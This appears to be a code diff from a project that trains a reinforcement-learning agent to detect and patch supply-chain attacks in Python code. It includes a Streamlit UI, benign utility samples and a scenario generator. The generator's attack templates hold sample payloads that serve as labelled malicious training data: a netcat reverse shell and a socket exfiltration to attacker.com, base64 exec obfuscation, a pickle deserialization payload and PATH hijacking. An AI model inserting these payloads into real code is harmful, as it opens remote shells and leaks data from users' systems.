    st.title("🛡️ Sentinel-Synth | GRPO DevSecOps Agent")
    st.markdown("Supply-chain attack detection and auto-patching platform via Reinforcement Learning.")

    env = get_env()

    with st.sidebar:
        st.header("Control Panel")
        mode = st.radio("Mode", ["Demo Scenarios", "Custom Code"])
        run_docker = st.checkbox("Use Docker Sandbox", value=False)
        st.markdown("---")
        st.markdown("**W&B Run:** [View Logs](https://wandb.ai)")
        st.markdown("**LLM Adapter:** `grpo_lora_qwen`")

    env.use_docker = run_docker

    if mode == "Demo Scenarios":
        left_col, right_col = st.columns([1, 1])
        demo_buttons = (
            (left_col, "Load Malicious Example", "malicious"),
            (right_col, "Load Benign Example", "benign"),
        )
        for column, button_text, wanted_label in demo_buttons:
            with column:
                if st.button(button_text):
                    matches = [s for s in env.scenarios if s["label"] == wanted_label]
                    if matches:
                        st.session_state["code"] = matches[0]["code_snippet"]
                        st.session_state["scenario"] = matches[0]

    code_input = st.text_area("Python Code Snippet", value=st.session_state.get("code", ""), height=300)

    if st.button("Analyze & Defuse"):
        if not code_input:
            st.warning("Please provide code to analyze.")
            return

        # Use the stored demo scenario only if the text area still holds its code;
        # anything typed or edited by the user becomes an ad-hoc scenario.
        scenario = st.session_state.get("scenario")
        if mode == "Custom Code" or not scenario or scenario["code_snippet"] != code_input:
            scenario = {
                "id": "custom",
                "label": "unknown",
                "type": "custom",
                "code_snippet": code_input,
                "patch": None,
            }

        with st.spinner("Agent computing actions in OpenEnv..."):
            obs, _ = env.reset(options={"scenario": scenario})

            # Dummy policy for UI demonstration since we don't load the real adapter here yet
            time.sleep(1)
            risk = obs["risk_score"][0]
            action = env.ACTION_SUBMIT_PATCH if risk > 0.4 and scenario.get("patch") else env.ACTION_ANALYZE

            if action == env.ACTION_ANALYZE:
                obs, reward, done, truncated, info = env.step(action)
                # Only take the follow-up decision if the ANALYZE step did not
                # already end the episode; stepping a finished episode is
                # undefined behaviour for Gymnasium environments.
                if not (done or truncated):
                    action = env.ACTION_BLOCK_PR if risk > 0.6 else env.ACTION_REQUEST_REVIEW
                    obs, reward, done, truncated, info = env.step(action)
            else:
                obs, reward, done, truncated, info = env.step(action)

        st.subheader("Agent Report")

        c1, c2, c3 = st.columns(3)
        c1.metric("Component Risk Score", f"{risk:.2f}", delta_color="inverse", delta=f"{risk-0.2:.2f}")
        # Display names indexed by the integer action id.
        action_names = ["ANALYZE", "SANDBOX", "BLOCK", "PATCH", "REVIEW"]
        c2.metric("Agent Action Taken", action_names[action])
        c3.metric("Reward Received", f"{reward:+.2f}")

        # Display tabs for detailed results
        tab1, tab2, tab3 = st.tabs(["Action Details", "Sandbox Telemetry", "Patch Proposal"])

        with tab1:
            if action == env.ACTION_BLOCK_PR:
                st.markdown("<div class='info-box status-malicious'>Action: BLOCKED. Vulnerability detected and no patch available.</div>", unsafe_allow_html=True)
            elif action == env.ACTION_SUBMIT_PATCH:
                st.markdown("<div class='info-box status-patched'>Action: PATCH SUBMITTED. Vulnerability neutralized.</div>", unsafe_allow_html=True)
                st.json(info)
            else:
                st.markdown("<div class='info-box status-benign'>Action: REVIEW / ANALYZE. Code appears nominally safe or requires human review.</div>", unsafe_allow_html=True)

        with tab2:
            st.markdown("**(Telemetry simulates background execution for static code)**")
            if "telemetry" in info:
                st.json(info["telemetry"])
            else:
                st.info("No sandbox execution triggered for this path.")

        with tab3:
            if action == env.ACTION_SUBMIT_PATCH and scenario.get("patch"):
                st.code(scenario["patch"], language='python')
                if info.get("validation_success"):
                    st.success("Patch passed 3-stage validation pipeline!")
            else:
                st.info("No patch generated.")
167
+
168
+ if __name__ == "__main__":
169
+ main()
sentinel_synth/data/__init__.py ADDED
File without changes
sentinel_synth/data/benign/ds_binarysearch.py ADDED
@@ -0,0 +1,13 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
def binary_search(arr, target):
    """Return an index of ``target`` in ``arr``, or -1 when it is absent.

    The search halves the candidate window each step and moves right when
    the probed element is smaller than ``target``, so ``arr`` is expected
    to be sorted in ascending order.
    """
    left, right = 0, len(arr) - 1
    while left <= right:
        middle = (left + right) // 2
        probe = arr[middle]
        if probe == target:
            return middle
        if probe < target:
            left = middle + 1
        else:
            right = middle - 1
    return -1
sentinel_synth/data/benign/ds_linkedlist.py ADDED
@@ -0,0 +1,19 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
class Node:
    """One element of a singly linked list: a payload and a next-pointer."""

    def __init__(self, data):
        self.data = data
        self.next = None


class LinkedList:
    """Singly linked list that tracks only its head node."""

    def __init__(self):
        self.head = None

    def append(self, data):
        """Attach a new node holding ``data`` after the current last node."""
        fresh = Node(data)
        cursor = self.head
        if not cursor:
            # Empty list: the new node becomes the head.
            self.head = fresh
            return
        # Walk to the final node, then link the new one behind it.
        while cursor.next:
            cursor = cursor.next
        cursor.next = fresh
sentinel_synth/data/benign/ds_queue.py ADDED
@@ -0,0 +1,15 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
class Queue:
    """FIFO queue backed by a list; new items go in at index 0 and leave from the end."""

    def __init__(self):
        self.items = []

    def enqueue(self, item):
        """Put ``item`` at the front of the backing list."""
        self.items[0:0] = [item]

    def dequeue(self):
        """Remove and return the oldest item, or ``None`` if the queue is empty."""
        if self.is_empty():
            return None
        return self.items.pop()

    def is_empty(self):
        """Return ``True`` when no items are stored."""
        return not self.items
sentinel_synth/data/benign/ds_sorting.py ADDED
@@ -0,0 +1,8 @@
 
 
 
 
 
 
 
 
 
1
def bubble_sort(arr):
    """Bubble-sort ``arr`` in place into ascending order and return the same list."""
    # After each pass the largest remaining value has settled at
    # ``unsorted_end``, so the compared prefix shrinks by one every pass.
    for unsorted_end in range(len(arr) - 1, -1, -1):
        for idx in range(unsorted_end):
            if arr[idx] > arr[idx + 1]:
                arr[idx], arr[idx + 1] = arr[idx + 1], arr[idx]
    return arr
sentinel_synth/data/benign/ds_stack.py ADDED
@@ -0,0 +1,15 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
class Stack:
    """LIFO stack backed by a list whose last element is the top."""

    def __init__(self):
        self.items = []

    def push(self, item):
        """Place ``item`` on top of the stack."""
        self.items.append(item)

    def pop(self):
        """Remove and return the top item, or ``None`` if the stack is empty."""
        if self.is_empty():
            return None
        return self.items.pop()

    def is_empty(self):
        """Return True when the stack holds no items."""
        return not self.items
sentinel_synth/data/benign/io_config.py ADDED
@@ -0,0 +1,15 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
def read_ini_config(content):
    """Parse simple INI text into a ``{section: {key: value}}`` dictionary.

    Blank lines and lines starting with ``#`` are ignored. A ``[name]`` line
    opens a section (re-opening a name resets that section). ``key=value``
    lines are stored, with surrounding whitespace stripped, under the most
    recently opened section; such lines appearing before any section header
    are discarded.

    Args:
        content: The full INI text as a single string.

    Returns:
        A dict mapping section names to dicts of string keys and values.
    """
    config = {}
    current_section = None
    for raw_line in content.split('\n'):
        line = raw_line.strip()
        if not line or line.startswith('#'):
            continue
        if line.startswith('[') and line.endswith(']'):
            current_section = line[1:-1]
            config[current_section] = {}
        # Compare against None rather than truthiness: a "[]" header yields
        # the empty string as section name, and its keys must still be kept.
        elif '=' in line and current_section is not None:
            key, val = line.split('=', 1)
            config[current_section][key.strip()] = val.strip()
    return config
sentinel_synth/data/benign/io_csv.py ADDED
@@ -0,0 +1,11 @@
 
 
 
 
 
 
 
 
 
 
 
 
1
def parse_csv(csv_content):
    """Parse simple comma-separated text into a list of row dictionaries.

    The first line supplies the column names; every following line becomes a
    dict pairing those names with the line's comma-separated values (extra
    values or extra headers are dropped by ``zip``). Quoting and escaped
    commas are not supported.

    Args:
        csv_content: The CSV text, with LF or CRLF line endings.

    Returns:
        A list with one dict per data row; empty when there is no data.
    """
    # splitlines() handles "\r\n" (the original split('\n') left a trailing
    # "\r" on the last header) and returns [] for empty input, which makes
    # the guard below reachable.
    lines = csv_content.strip().splitlines()
    if not lines:
        return []
    headers = lines[0].split(',')
    return [dict(zip(headers, line.split(','))) for line in lines[1:]]
sentinel_synth/data/benign/io_json.py ADDED
@@ -0,0 +1,5 @@
 
 
 
 
 
 
1
+ import json
2
+
3
def format_json(obj):
    """Serialize ``obj`` to JSON text with 4-space indentation and sorted keys."""
    dump_options = {"indent": 4, "sort_keys": True}
    return json.dumps(obj, **dump_options)
sentinel_synth/data/benign/io_log.py ADDED
@@ -0,0 +1,8 @@
 
 
 
 
 
 
 
 
 
1
def parse_logs(log_lines):
    """Split ``LEVEL - message`` log lines into level/message dictionaries.

    Lines lacking the `` - `` separator are skipped. Square brackets are
    stripped from both ends of the level; the message is kept verbatim.
    """
    entries = []
    for entry in log_lines:
        level, separator, message = entry.partition(' - ')
        if not separator:
            continue
        entries.append({"level": level.strip('[]'), "message": message})
    return entries
sentinel_synth/data/benign/io_template.py ADDED
@@ -0,0 +1,6 @@
 
 
 
 
 
 
 
1
def render_template(template, context):
    """Substitute each ``{{key}}`` placeholder in ``template`` with its context value.

    Values are converted with ``str``; placeholders without a matching key
    are left as they are.
    """
    rendered = template
    for name, replacement in context.items():
        placeholder = "{{" + format(name) + "}}"
        rendered = rendered.replace(placeholder, str(replacement))
    return rendered
sentinel_synth/data/benign/math_factorial.py ADDED
@@ -0,0 +1,5 @@
 
 
 
 
 
 
1
def factorial(n):
    """Return ``n!`` for a non-negative whole number ``n``.

    Computed iteratively, so large ``n`` cannot exhaust the recursion limit.

    Args:
        n: A non-negative integer (an integral float such as ``5.0`` is
            also accepted and yields a float result).

    Returns:
        The product ``n * (n - 1) * ... * 1``; 1 when ``n`` is 0 or 1.

    Raises:
        ValueError: If ``n`` is negative or not a whole number. The original
            recursive version never terminated for such inputs.
    """
    if n < 0 or n != int(n):
        raise ValueError("factorial() requires a non-negative whole number")
    result = 1
    while n > 1:
        result *= n
        n -= 1
    return result
sentinel_synth/data/benign/math_fibonacci.py ADDED
@@ -0,0 +1,7 @@
 
 
 
 
 
 
 
 
1
def fibonacci(n):
    """Return the nth Fibonacci number (``F(0) = 0``, ``F(1) = 1``).

    Runs in a linear number of additions; the original double recursion took
    exponential time.

    Args:
        n: Index of the desired term, as an integer. Any ``n <= 0`` yields 0.

    Returns:
        The nth Fibonacci number as an int.
    """
    if n <= 0:
        return 0
    previous, current = 0, 1
    # Advance the (F(k-1), F(k)) pair from k = 1 up to k = n.
    for _ in range(n - 1):
        previous, current = current, previous + current
    return current
sentinel_synth/data/benign/math_gcd.py ADDED
@@ -0,0 +1,5 @@
 
 
 
 
 
 
1
def gcd(a, b):
    """Return the greatest common divisor of ``a`` and ``b``.

    Uses the Euclidean algorithm. The result is always non-negative, and
    ``gcd(0, 0)`` is 0.
    """
    while b:
        a, b = b, a % b
    # Python's % takes the sign of the divisor, so the loop can finish on a
    # negative value (e.g. gcd(4, -6) ended at -2); normalise the sign.
    return abs(a)
sentinel_synth/data/benign/math_matrix.py ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
def matrix_addition(mat1, mat2):
    """Return the element-wise sum of two matrices given as lists of rows.

    The dimensions are taken from ``mat1``: its row count and the length of
    its first row.
    """
    total = []
    for i in range(len(mat1)):
        summed_row = []
        for j in range(len(mat1[0])):
            summed_row.append(mat1[i][j] + mat2[i][j])
        total.append(summed_row)
    return total
sentinel_synth/data/benign/math_prime.py ADDED
@@ -0,0 +1,8 @@
 
 
 
 
 
 
 
 
 
1
def is_prime(n):
    """Return True if ``n`` is prime, using trial division up to its square root."""
    if n <= 1:
        return False
    upper_bound = int(n ** 0.5) + 1
    has_divisor = any(n % divisor == 0 for divisor in range(2, upper_bound))
    return not has_divisor
sentinel_synth/data/benign/misc_calc.py ADDED
@@ -0,0 +1,13 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
def basic_calculator(a, b, op):
    """Apply the arithmetic operator named by ``op`` to ``a`` and ``b``.

    Supported operators are ``+``, ``-``, ``*`` and ``/``. Any other ``op``
    yields ``None``.

    Raises:
        ValueError: When dividing and ``b`` equals zero.
    """
    if op == '+':
        return a + b
    if op == '-':
        return a - b
    if op == '*':
        return a * b
    if op != '/':
        return None
    if b == 0:
        raise ValueError("Division by zero")
    return a / b
sentinel_synth/data/benign/misc_date.py ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
def format_iso_date(year, month, day):
    """Build a ``YYYY-MM-DD`` string from integer date components.

    The year is zero-padded to four digits, month and day to two. The values
    are not checked for being a real calendar date.
    """
    pattern = "{:04d}-{:02d}-{:02d}"
    return pattern.format(year, month, day)
sentinel_synth/data/benign/misc_password.py ADDED
@@ -0,0 +1,8 @@
 
 
 
 
 
 
 
 
 
1
def is_strong_password(pwd):
    """Return True when ``pwd`` meets the basic strength rules.

    The rules are: at least 8 characters, and at least one uppercase letter,
    one lowercase letter and one digit.
    """
    if len(pwd) < 8:
        return False
    found_upper = found_lower = found_digit = False
    for ch in pwd:
        found_upper = found_upper or ch.isupper()
        found_lower = found_lower or ch.islower()
        found_digit = found_digit or ch.isdigit()
    return found_upper and found_lower and found_digit
sentinel_synth/data/benign/misc_temp.py ADDED
@@ -0,0 +1,7 @@
 
 
 
 
 
 
 
 
1
def celsius_to_fahrenheit(c):
    """Return the Fahrenheit equivalent of the Celsius temperature ``c``."""
    scaled = c * 9 / 5
    return scaled + 32
4
+
5
def fahrenheit_to_celsius(f):
    """Return the Celsius equivalent of the Fahrenheit temperature ``f``."""
    offset = f - 32
    return offset * 5 / 9
sentinel_synth/data/benign/misc_url.py ADDED
@@ -0,0 +1,11 @@
 
 
 
 
 
 
 
 
 
 
 
 
1
def parse_url_params(url):
    """Extract the query-string parameters of ``url`` as a dictionary.

    Everything after the first ``?`` is split on ``&``; each piece containing
    ``=`` is split once into key and value. Pieces without ``=`` are skipped,
    later duplicates overwrite earlier ones, and no percent-decoding is done.
    """
    _, marker, query = url.partition('?')
    if not marker:
        return {}
    params = {}
    for chunk in query.split('&'):
        name, equals, value = chunk.partition('=')
        if equals:
            params[name] = value
    return params
sentinel_synth/data/benign/str_anagram.py ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
def is_anagram(s1, s2):
    """Return True when ``s1`` and ``s2`` are anagrams, ignoring spaces and letter case."""

    def sorted_letters(text):
        # Drop spaces, fold case, then sort for an order-independent comparison.
        return sorted(text.replace(" ", "").lower())

    return sorted_letters(s1) == sorted_letters(s2)
sentinel_synth/data/benign/str_caesar.py ADDED
@@ -0,0 +1,10 @@
 
 
 
 
 
 
 
 
 
 
 
1
def caesar_cipher(text, shift):
    """Apply a Caesar shift to the ASCII letters of ``text``.

    Each letter ``a``-``z`` or ``A``-``Z`` is rotated ``shift`` places within
    its own case, wrapping around the alphabet; a negative ``shift`` rotates
    backwards. Every other character passes through unchanged. That includes
    non-ASCII letters, which the original ``isalpha()`` test wrongly pushed
    through the 26-letter arithmetic (e.g. "é" became "h").

    Args:
        text: The string to transform.
        shift: Number of alphabet positions to rotate by.

    Returns:
        The transformed string.
    """
    pieces = []
    for char in text:
        if 'a' <= char <= 'z':
            base = ord('a')
        elif 'A' <= char <= 'Z':
            base = ord('A')
        else:
            pieces.append(char)
            continue
        pieces.append(chr((ord(char) - base + shift) % 26 + base))
    # Join once instead of growing a string with += on every character.
    return "".join(pieces)
sentinel_synth/data/benign/str_palindrome.py ADDED
@@ -0,0 +1,4 @@
 
 
 
 
 
1
def is_palindrome(s):
    """Return True if ``s`` reads the same in both directions.

    Only alphanumeric characters are compared, and letter case is ignored.
    """
    kept = []
    for ch in s:
        if ch.isalnum():
            kept.append(ch.lower())
    cleaned = ''.join(kept)
    return cleaned == ''.join(reversed(cleaned))
sentinel_synth/data/benign/str_slug.py ADDED
@@ -0,0 +1,6 @@
 
 
 
 
 
 
 
1
def generate_slug(title):
    """Turn ``title`` into a lowercase, hyphen-separated, URL-friendly slug.

    Characters other than ``a-z``, ``0-9``, whitespace and ``-`` are removed;
    runs of whitespace and hyphens collapse to a single hyphen; leading and
    trailing hyphens are trimmed.
    """
    import re

    lowered = title.lower()
    allowed_only = re.sub(r'[^a-z0-9\s-]', '', lowered)
    hyphenated = re.sub(r'[\s-]+', '-', allowed_only)
    return hyphenated.strip('-')
sentinel_synth/data/benign/str_wordcount.py ADDED
@@ -0,0 +1,7 @@
 
 
 
 
 
 
 
 
1
def word_count(text):
    """Return a dict mapping each whitespace-separated word in ``text`` to its count.

    Words are compared exactly: case and attached punctuation are significant.
    """
    tally = {}
    for token in text.split():
        if token in tally:
            tally[token] += 1
        else:
            tally[token] = 1
    return tally
sentinel_synth/data/generate_scenarios.py ADDED
@@ -0,0 +1,253 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import os
2
+ import json
3
+ import random
4
+ import subprocess
5
+ import tempfile
6
+ import uuid
7
+ from pathlib import Path
8
+
9
+ # ============================================================
10
+ # Attack Templates for Mutation Engine (Track B)
11
+ # ============================================================
12
# Maps an attack-type name to the snippet used to build a malicious sample.
#   "inject": source text that generate_track_b_scenarios() prepends to a
#             benign file's code to form the scenario's "code_snippet".
#   "patch":  empty in every entry and not read by generate_track_b_scenarios(),
#             which uses the untouched benign code as the patch instead.
ATTACK_TEMPLATES = {
    # NOTE(review): imports a misspelled module name; presumably this raises
    # ModuleNotFoundError if the snippet is ever executed - confirm intended.
    "typosquatting": {
        "inject": "import pythonn\n\n",
        "patch": "",
    },
    # NOTE(review): the snippet calls base64 without importing it, so running
    # it as-is would raise NameError rather than reach exec() - confirm.
    "obfuscated_exec": {
        "inject": "exec(base64.b64decode('cHJpbnQoIkhlbGxvIGZyb20gaGlkZGVuIGV4ZWMhIik='))\n\n",
        "patch": "",
    },
    # Prepends /tmp to PATH.
    "env_hijack": {
        "inject": "import os\nos.environ['PATH'] = '/tmp:' + os.environ.get('PATH', '')\n\n",
        "patch": "",
    },
    # Attempts to spawn an external process; any failure is swallowed.
    "subprocess_backdoor": {
        "inject": "import subprocess\ntry:\n subprocess.call(['nc', '-e', '/bin/sh', 'attacker.com', '4444'])\nexcept:\n pass\n\n",
        "patch": "",
    },
    # eval() hidden behind a wrapper with a harmless-looking name.
    "eval_hidden": {
        "inject": "def safe_eval(x):\n return eval(x)\nsafe_eval('__import__(\"os\").system(\"echo 1\")')\n\n",
        "patch": "",
    },
    # Unpickles a hand-written byte payload.
    "pickle_deserialization": {
        "inject": "import pickle\npickle.loads(b\"c__builtin__\\neval\\n(Vprint('malicious')\\ntR.\")\n\n",
        "patch": "",
    },
    # Attempts an outbound socket send; any failure is swallowed.
    "socket_exfil": {
        "inject": "import socket\ntry:\n s = socket.socket()\n s.connect(('attacker.com', 80))\n s.sendall(b'exfiltrated data')\nexcept:\n pass\n\n",
        "patch": "",
    },
    # Dynamic __import__ used to run a shell command.
    "malicious_import": {
        "inject": "__import__('os').system('echo pwned > /tmp/pwned')\n\n",
        "patch": ""
    }
}
46
+
47
def load_benign_files(benign_dir):
    """Read every ``.py`` file directly inside ``benign_dir``.

    Args:
        benign_dir: Path of the directory holding the benign seed files.

    Returns:
        A list of ``{"filename": ..., "code": ...}`` dicts ordered by file
        name, or an empty list when ``benign_dir`` is not an existing
        directory.
    """
    files_data = []
    if not os.path.isdir(benign_dir):
        return files_data
    # os.listdir() order is arbitrary and platform-dependent; sorting keeps
    # the result (and any seeded random sampling over it) reproducible.
    for filename in sorted(os.listdir(benign_dir)):
        if not filename.endswith(".py"):
            continue
        # Decode explicitly as UTF-8 rather than the locale's default encoding.
        with open(os.path.join(benign_dir, filename), "r", encoding="utf-8") as f:
            files_data.append({"filename": filename, "code": f.read()})
    return files_data
57
+
58
def auto_generate_unit_test(filename, code):
    """Build the source of a small unit test for a benign code sample.

    The generated test starts with ``import code`` and then asserts one known
    result for the first recognised function the sample defines. Samples
    defining none of the recognised functions get a trivial assertion, so the
    test only checks that the module imports.

    Args:
        filename: Name of the sample file. Currently unused; kept so existing
            callers do not need to change.
        code: Source text of the sample.

    Returns:
        The test source as a string.
    """
    # Checked in order; the first function that the sample defines wins.
    known_assertions = (
        ("fibonacci", "assert code.fibonacci(5) == 5\n"),
        ("factorial", "assert code.factorial(5) == 120\n"),
        ("is_prime", "assert code.is_prime(7) == True\n"),
        ("gcd", "assert code.gcd(48, 18) == 6\n"),
        ("is_palindrome", "assert code.is_palindrome('racecar') == True\n"),
        ("celsius_to_fahrenheit", "assert code.celsius_to_fahrenheit(0) == 32\n"),
    )
    test_code = "import code\n"
    for function_name, assertion in known_assertions:
        # Require an actual definition: a bare substring test also matched
        # comments, docstrings and longer identifiers containing the name,
        # producing a test that calls a function which does not exist.
        if f"def {function_name}(" in code:
            return test_code + assertion
    # Minimal test: just ensure the module loads without error
    return test_code + "assert True # module loaded successfully\n"
77
+
78
def generate_track_b_scenarios(benign_files, num_examples=40):
    """Track B: build scenarios with the custom mutation engine (always used).

    Three kinds of scenario are produced from randomly chosen benign files:

    * true positives - an ATTACK_TEMPLATES snippet prepended to benign code,
      with the untouched benign code as the expected patch;
    * false positives - a suspicious-looking but harmless snippet prepended
      to benign code;
    * functional - the benign code unchanged.

    Args:
        benign_files: Non-empty list of ``{"filename", "code"}`` dicts, as
            returned by ``load_benign_files``.
        num_examples: Total number of scenarios. Half (rounded down) are true
            positives, a quarter (rounded down) are false positives and the
            remainder are functional, so the default of 40 gives 20/10/10.
            This argument was previously ignored.

    Returns:
        A list of scenario dicts, grouped by kind in the order above.

    Raises:
        ValueError: If ``num_examples`` is negative.
        IndexError: If ``benign_files`` is empty (raised by ``random.choice``).
    """
    if num_examples < 0:
        raise ValueError("num_examples must be non-negative")
    true_positive_count = num_examples // 2
    false_positive_count = num_examples // 4
    functional_count = num_examples - true_positive_count - false_positive_count

    scenarios = []

    # True positives
    attack_choices = list(ATTACK_TEMPLATES.items())  # built once, not per sample
    for _ in range(true_positive_count):
        bf = random.choice(benign_files)
        attack_name, attack_data = random.choice(attack_choices)
        scenarios.append({
            "id": f"tp_{uuid.uuid4().hex[:8]}",
            "type": "true_positive",
            "code_snippet": attack_data["inject"] + bf["code"],
            "patch": bf["code"],
            "unit_test_code": auto_generate_unit_test(bf["filename"], bf["code"]),
            "label": "malicious",
            "source": "mutation_engine",
            "attack_type": attack_name
        })

    # False positives: code that resembles an attack pattern but is benign.
    fp_templates = [
        ("fp_eval", "def safe_calc(expr):\n # Legit eval in controlled env\n return eval(expr, {'__builtins__': {}}, {})\n\n"),
        ("fp_requests", "import requests\n# Just checking internet\ntry:\n requests.get('https://8.8.8.8', timeout=1)\nexcept:\n pass\n\n"),
        ("fp_os_environ", "import os\n# Setup proxy\nos.environ['HTTP_PROXY'] = 'http://proxy.local:8080'\n\n"),
        ("fp_base64", "import base64\ndef encode_msg(msg):\n return base64.b64encode(msg.encode())\n\n")
    ]
    for _ in range(false_positive_count):
        bf = random.choice(benign_files)
        _fp_name, fp_code = random.choice(fp_templates)
        scenarios.append({
            "id": f"fp_{uuid.uuid4().hex[:8]}",
            "type": "false_positive",
            "code_snippet": fp_code + bf["code"],
            "patch": None,
            "unit_test_code": auto_generate_unit_test(bf["filename"], bf["code"]),
            "label": "benign",
            "source": "mutation_engine",
            "attack_type": None
        })

    # Functional: unmodified benign code.
    for _ in range(functional_count):
        bf = random.choice(benign_files)
        scenarios.append({
            "id": f"fn_{uuid.uuid4().hex[:8]}",
            "type": "functional",
            "code_snippet": bf["code"],
            "patch": None,
            "unit_test_code": auto_generate_unit_test(bf["filename"], bf["code"]),
            "label": "benign",
            "source": "mutation_engine",
            "attack_type": None
        })
    return scenarios
134
+
135
def generate_track_a_scenarios_with_sdk(output_dir: str, num_samples: int = 10):
    """
    Track A: Use Meta's synthetic-data-kit to generate high-quality code examples.
    Follows the 4-stage pipeline: ingest -> create -> curate -> save-as

    The pipeline runs in a temporary workspace that is deleted afterwards.
    Exported items that carry a ``patch`` become malicious true-positive
    scenarios; the rest become benign functional scenarios.

    Args:
        output_dir: Currently unused (the workspace is a temporary
            directory); kept so existing callers do not need to change.
        num_samples: Maximum number of scenarios to return. This argument was
            previously ignored and every exported item was returned.

    Returns:
        A list of scenario dicts. It is empty when the CLI or its config is
        missing, or when a pipeline step fails, times out or emits output
        that cannot be parsed; a warning is printed in each of those cases.
    """
    sdk_scenarios = []

    # Check if synthetic-data-kit CLI is available
    try:
        subprocess.run(["synthetic-data-kit", "--help"], capture_output=True, check=True)
    except (subprocess.SubprocessError, OSError):
        # OSError also covers a CLI that exists but cannot be executed.
        print("⚠️ Meta synthetic-data-kit CLI not found. Track A disabled.")
        return sdk_scenarios

    # Path to our SDK config
    config_path = Path(__file__).parent / "sdk_config.yaml"
    if not config_path.exists():
        print(f"⚠️ SDK config not found at {config_path}. Track A disabled.")
        return sdk_scenarios

    # Create a temporary directory for the SDK workspace
    with tempfile.TemporaryDirectory() as tmpdir:
        workspace_dir = Path(tmpdir) / "sdk_workspace"
        workspace_dir.mkdir()

        try:
            # 1. Ingest (We'll ingest the benign files as seeds)
            benign_dir = Path(__file__).parent / "benign"
            if benign_dir.exists():
                subprocess.run(
                    ["synthetic-data-kit", "ingest", str(benign_dir), "--output", str(workspace_dir / "ingested")],
                    check=True, capture_output=True
                )

            # 2. Create (Generate synthetic examples)
            subprocess.run(
                ["synthetic-data-kit", "create", str(workspace_dir / "ingested"),
                 "--type", "qa", "-c", str(config_path), "--output", str(workspace_dir / "created")],
                check=True, capture_output=True, timeout=600
            )

            # 3. Curate (Filter low-quality examples)
            subprocess.run(
                ["synthetic-data-kit", "curate", str(workspace_dir / "created"),
                 "--output", str(workspace_dir / "curated")],
                check=True, capture_output=True
            )

            # 4. Save-As (Export to JSON)
            output_json = workspace_dir / "final_sdk.json"
            subprocess.run(
                ["synthetic-data-kit", "save-as", str(workspace_dir / "curated"),
                 "--format", "json", "--output", str(output_json)],
                check=True, capture_output=True
            )

            # Load generated data and convert to our format
            if output_json.exists():
                with open(output_json, "r", encoding="utf-8") as f:
                    data = json.load(f)
                if not isinstance(data, list):
                    print("⚠️ SDK output is not a JSON list. Track A produced no scenarios.")
                    data = []
                for item in data:
                    if len(sdk_scenarios) >= num_samples:
                        break
                    if not isinstance(item, dict):
                        continue
                    # Expecting keys based on sdk_config.yaml prompts
                    code_snippet = item.get("code_snippet") or item.get("code")
                    if not code_snippet:
                        # A scenario without code cannot be evaluated.
                        continue
                    patch = item.get("patch")
                    is_malicious = bool(patch)
                    # Id prefix and attack_type follow the Track B convention:
                    # "tp" plus an attack type for malicious samples, "fn" and
                    # no attack type for benign ones.
                    id_prefix = "tp" if is_malicious else "fn"
                    sdk_scenarios.append({
                        "id": f"{id_prefix}_sdk_{uuid.uuid4().hex[:8]}",
                        "type": "true_positive" if is_malicious else "functional",
                        "code_snippet": code_snippet,
                        "patch": patch,
                        "unit_test_code": item.get("unit_test_code", "import code\nassert True"),
                        "label": "malicious" if is_malicious else "benign",
                        "source": "synthetic_data_kit",
                        "attack_type": item.get("attack_type", "llm_generated") if is_malicious else None
                    })
        except subprocess.TimeoutExpired:
            print("⚠️ SDK generation timed out.")
        except subprocess.CalledProcessError as e:
            print(f"⚠️ SDK command failed: {e.stderr.decode() if e.stderr else 'Unknown error'}")
        except json.JSONDecodeError as e:
            print(f"⚠️ SDK output could not be parsed as JSON: {e}")

    return sdk_scenarios
214
+
215
def main():
    """Command-line entry point: generate the scenario dataset and save it as JSON.

    Loads the benign seed files, always generates 40 Track B (mutation
    engine) scenarios, optionally adds Track A (synthetic-data-kit)
    scenarios when ``--use-sdk`` is given, shuffles everything and writes the
    result to ``--output``. Exits early with a message if no benign files are
    found.
    """
    import argparse

    parser = argparse.ArgumentParser()
    parser.add_argument("--benign-dir", type=str, default="sentinel_synth/data/benign/")
    parser.add_argument("--output", type=str, default="sentinel_synth/data/scenarios.json")
    # The help text names the executable that is actually invoked
    # ("synthetic-data-kit"); it previously referred to a `synth` CLI.
    parser.add_argument(
        "--use-sdk",
        action="store_true",
        help="Use Meta synthetic-data-kit (requires the `synthetic-data-kit` CLI)",
    )
    parser.add_argument("--sdk-samples", type=int, default=10, help="Number of SDK samples to generate")
    args = parser.parse_args()

    benign_files = load_benign_files(args.benign_dir)
    if not benign_files:
        print(f"No benign files found in {args.benign_dir}. Create some first.")
        return

    # Start with Track B scenarios (mutation engine)
    scenarios = generate_track_b_scenarios(benign_files, 40)

    # Add Track A (Meta SDK) if requested
    if args.use_sdk:
        # The SDK step works in its own temporary directory; args.output is
        # only where the final aggregated data is saved.
        sdk_scenarios = generate_track_a_scenarios_with_sdk(os.path.dirname(args.output), args.sdk_samples)
        scenarios.extend(sdk_scenarios)
        if sdk_scenarios:
            print(f"Added {len(sdk_scenarios)} SDK-generated scenarios.")

    # Shuffle and save
    random.shuffle(scenarios)
    output_parent = os.path.dirname(args.output)
